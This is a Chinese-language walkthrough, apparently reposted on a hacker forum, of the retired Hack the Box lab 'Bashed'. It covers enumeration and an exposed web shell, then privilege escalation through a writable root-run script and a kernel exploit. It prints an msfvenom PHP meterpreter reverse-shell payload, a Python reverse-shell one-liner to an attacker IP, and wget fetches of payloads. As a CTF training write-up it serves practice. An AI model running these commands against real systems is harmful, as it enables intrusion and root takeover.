Hack the Box Challenge Bashed Walkthrough

pip
4160pip安全工作者
2018-09-05 17:35:36
4160 2018-09-05 17:35:36
话题: 教程 黑客工具
今天我们要解决CTF挑战赛“Bashed”。这是一个由Hack the Box开发的实验室。他们拥有一系列令人惊叹的在线实验室,您可以在其上练习渗透测试技能。他们的实验室是专为初学者设计的专家渗透测试仪。Bashed是一个退休实验室。

等级:中等
任务:  在易受攻击的实验室中找到user.txt和root.txt。
让我们开始!
由于这些实验室仅在线提供,因此它们具有静态IP。Bashed Lab的IP:10.10.10.68。
现在,我们一如既往地开始使用端口枚举进行黑客攻击。
nmap -A 10.10.10.68
知道端口80在受害者的网络上是开放的,我们倾向于在浏览器中探索他的IP并打开下面的图像
接下来,我们使用kali的dirb工具枚举目录并找到一些重要的目录,例如/ dev
因此,当您在浏览器中打开/ dev目录时,您将获得phpbash.php的链接。单击该链接。
它将重定向到下面的页面,如下所示,它看起来像是通过浏览器进行交互的shell。

之后,您可以执行任意os任意命令来测试它是否正常工作。我们运行ls命令检查当前目录中的当前列表。
在inside / html目录中我们找到了uploads文件夹,因此现在我们可以通过上传后门来轻松破坏目标系统。
使用msfvenom我们通过执行以下命令创建了一个恶意的shell.php文件。
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
同时运行多路/处理程序,用于受害者系统的反向连接。
我们使用Python HTTP服务器传输文件,您也可以使用另一种方法从上传目录中的wget传输和下载恶意文件
现在从浏览器执行恶意文件shell.php,如下所示,然后转到metasploit框架进行反向连接。
执行上传的后门文件后,返回Metasploit框架并等待meterpreter会话。

msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.28
msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit
从下面给出的图像中,您可以观察   为访问受害者tty shell而打开的meterpreter session1
现在让我们通过抓取user.txt和root.txt文件来完成任务。首先,我进入/ home目录并检查其中的可用文件和目录。

cd home
ls
这里有一个目录arrexel,当我探索  / home / arrexel时,我看到了user.txt并使用cat命令进行阅读。

cd arrexells
cat user.txt下一个任务
为了生成目标系统的正确tty shell,我们需要导入python文件,因此,我在meterpreter shell中运行以下命令shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a
运行ls -al命令以查看具有其权限的所有目录。在这里,您将注意到用户scriptmanager具有访问/ scripts目录的权限。
当我们尝试打开/ scripts目录作为默认用户时,它会显示Permission Denied消息。然后运行sudo -l命令,告诉我们scriptmanager没有密码。
然后我们在scriptmanager的帮助下运行以下命令来穿透脚本文件夹

sudo -u scriptmanager ls /scriptssudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt因为我们发现了一个python文件,所以我们的策略是将恶意python文件中的原始test.py文件替换为netcat上的反向连接,为此,需要将以下代码保存在文本文件中。
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);使用.py 扩展名保存此文件并将其传输到受害者的系统并在侦听端口上启动netcat。
注意:将代码内的10.10.14.28替换为VPN IP。
现在下载/ tmp中的恶意python文件
wget http://10.10.14.28/root.py




然后使用以下命令将/.mpmp中的root.py复制到/ script中的test.py中。
一段时间后,您将获得netcat终端的反向连接和root访问权限。现在通过捕获root.txt文件完成任务,如下所示

nc -lvp 1234
id
cd /root
ls
cat root.txt
查找root.txt标志方法。
我们在上面的方法中找到了机器架构14.0。因此,我们开始在Google中寻找相关的内核漏洞,幸运的是从这里找到了一个利用root权限升级的漏洞。
将整个文本复制并粘贴到文本文件中并另存为poc.c
之后,在以下命令的帮助下编译它:
gcc poc.c -o pwn
运行python HTTP服务器将其传输到目标系统。
最后,从/ dev / shm中的 wget下载编译文件pwn到目标机器,如图所示,然后给予完全权限并运行该文件。
wget http://10.10.14.28/pwn
chmod 777 pwn

./pwn
它将为您提供root访问权限,现在尽快捕获root.txt标志,因为它会在一段时间后崩溃内核。
cd /root
cat root.txt


本文标题:Hack the Box Challenge Bashed Walkthrough
本文作者:pip
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2266.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan